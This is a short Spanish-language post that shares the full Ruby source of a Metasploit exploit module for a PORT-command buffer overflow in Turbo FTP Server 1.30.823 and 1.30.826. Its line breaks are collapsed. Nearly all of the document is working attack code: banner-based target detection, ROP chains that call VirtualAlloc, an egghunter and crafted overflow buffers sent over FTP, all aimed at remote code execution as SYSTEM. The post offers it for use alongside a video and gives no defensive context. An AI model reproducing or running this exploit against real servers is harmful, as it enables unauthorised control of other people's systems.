Turbo FTP Server 1.30.823 PORT Overflow

Hoy os traemos un módulo de tipo exploit para Metasploit. La aplicación vulnerable es Turbo FTP Server. Os dejamos el código fuente (ruby) del módulo y un video que ayuda a la explotación.

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.#   http://metasploit.com/##

require 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = GreatRankinginclude Msf::Exploit::Remote::Ftpinclude Msf::Exploit::Remote::Egghunterdef initialize(info = {})super(update_info(info,'Name'           => 'Turbo FTP Server 1.30.823 PORT Overflow','Description'    => %q{This module exploits a buffer overflow vulnerability found in the PORTcommand in Turbo FTP Server 1.30.823 & 1.30.826, which results in remotecode execution under the context of SYSTEM.},'Author'         =>['Zhao Liang',    #Initial Descovery'Lincoln',       #Metasploit'corelanc0d3r',  #Metasploit'thelightcosine' #Metasploit],'License'        => MSF_LICENSE,'Platform'       => [ 'win' ],'References'     =>[[ 'OSVDB', '85887' ]],'Payload'        =>{'BadChars'       => "\x00",'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,'EncoderOptions' => { 'BufferRegister' => 'EDI' }},'Targets'        =>[[ 'Automatic', {} ],['Windows Universal TurboFtp 1.30.823',{'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]'ver' => 823},],[ 'Windows Universal TurboFtp 1.30.826',{'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]'ver' => 826},],],'DisclosureDate' => 'Oct 03 2012','DefaultTarget'  => 0))enddef checkconnectdisconnectif (banner =~ /1\.30\.823/)return Exploit::CheckCode::Vulnerableelsif (banner =~ /1\.30\.826/)return Exploit::CheckCode::Vulnerableendreturn Exploit::CheckCode::Safeenddef create_rop_chain(ver)# rop chain generated with mona.py - www.corelan.beif ver == 823rop_gadgets =[0x004b692a, # POP ECX # RETN [tbssvc.exe]0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]0x005d1c99, # POP EBP # RETN [tbssvc.exe]0x004cad5d, # & jmp esp [tbssvc.exe]0x004ab16b, # POP EBX # RETN [tbssvc.exe]0x00000001, # 0x00000001-> ebx0x005ef7f6, # POP EDX # RETN [tbssvc.exe]0x00001000, # 0x00001000-> edx0x005d7139, # POP ECX # RETN [tbssvc.exe]0x00000040, # 0x00000040-> ecx0x004df1e0, # POP EDI # RETN [tbssvc.exe]0x00411985, # RETN (ROP NOP) [tbssvc.exe]0x00502639, # POP EAX # RETN [tbssvc.exe]0x90909090, # nop0x00468198, # PUSHAD # RETN [tbssvc.exe]].flatten.pack("V*")elsif ver == 826rop_gadgets =[0x0050eae4, # POP ECX # RETN [tbssvc.exe]0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]0x00496A65, # XOR EAX,EAX [tbssvc.exe]0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe]0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe]0x00000001, # 0x00000001-> ebx0x0058a27a, # POP EBP # RETN [tbssvc.exe]0x004df7dd, # & call esp [tbssvc.exe]0x005f07f6, # POP EDX # RETN [tbssvc.exe]0x00001000, # 0x00001000-> edx0x004adc08, # POP ECX # RETN [tbssvc.exe]0x00000040, # 0x00000040-> ecx0x00465fbe, # POP EDI # RETN [tbssvc.exe]0x004fb207, # RETN (ROP NOP) [tbssvc.exe]0x00465f36, # POP EAX # RETN [tbssvc.exe]0x90909090, # nop0x004687ff, # PUSHAD # RETN [tbssvc.exe]].flatten.pack("V*")endreturn rop_gadgetsenddef exploitmy_target = targetif my_target.name == 'Automatic'print_status("Automatically detecting the target")connectdisconnectif (banner =~ /1\.30\.823/)my_target = targets[1]elsif (banner =~ /1\.30\.826/)my_target = targets[2]endif (not my_target)print_status("No matching target...quiting")returnendtarget = my_targetendprint_status("Selected Target: #{my_target.name}")connect_loginrop_chain = create_rop_chain(target['ver'])rop = rop_chain.unpack('C*').join(',')eggoptions ={:checksum => true,:eggtag => 'w00t',:depmethod => 'virtualalloc',:depreg => 'esi'}badchars = "\x00"hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)speedupasm = "mov edx,eax\n"speedupasm << "sub edx,0x1000\n"speedupasm << "sub esp,0x1000"speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_stringfasterhunter = speedupfasterhunter << hunterprint_status("Connecting to target #{target.name} server")buf1 = rand_text_alpha(2012)buf1 << eggbuf1 << rand_text_alpha(100)buf2 = rand_text_alpha(4).unpack('C*').join(',')buf2 << ","buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eipbuf2 << ","buf2 << ropbuf2 << ","buf2 << fasterhunter.unpack('C*').join(',')buf2 << ","buf2 << rand_text_alpha(90).unpack('C*').join(',')send_cmd( ['CWD', buf1], true );send_cmd( ['PORT', buf2], true );print_status("Egghunter deployed, locating shellcode")handlerdisconnectendend

[youtube aW0jfcXKQk8 nolink]